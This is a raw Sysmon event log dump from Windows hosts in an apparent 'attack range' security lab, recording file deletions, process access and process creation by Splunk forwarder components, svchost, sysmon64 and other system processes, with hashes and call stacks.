23542300x8000000000000000293807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:44.801{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81B6520FC13BEA022F8DC99B88494042,SHA256=4E22D8F0D6687FDE1A93690068C00CB4B219AD3AED1DBD130AF225B9B8F7A732,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218189Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13A0-6216-9804-000000003902}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218188Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-13A0-6216-9804-000000003902}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218187Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-13A0-6216-9804-000000003902}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218186Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218185Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218184Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.894{4F8D34B0-13A0-6216-9804-000000003902}3380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:44.065{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=449B4926B7872B350D6BC83DD416C832,SHA256=4BFE426BBF8479585CEC12D8FACA05AA288CE55DDCB9B6D46F5C16761B866BBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD4BED34D27FF58E56C5323E94AA3C52,SHA256=3EDCA4DD4A6BF44D70F213F14D7E8D2189FA12C56A5481D8685A300BFE850A72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.925{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F71BE82F4060011A17F38C89AC672B6C,SHA256=D95D5989540B75B9080C5343A9C200EDB0869E7322656698D0E2C0892D05FA7F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.644{4F8D34B0-13A1-6216-9904-000000003902}20282944C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-13A1-6216-9904-000000003902}2028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:45.425{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 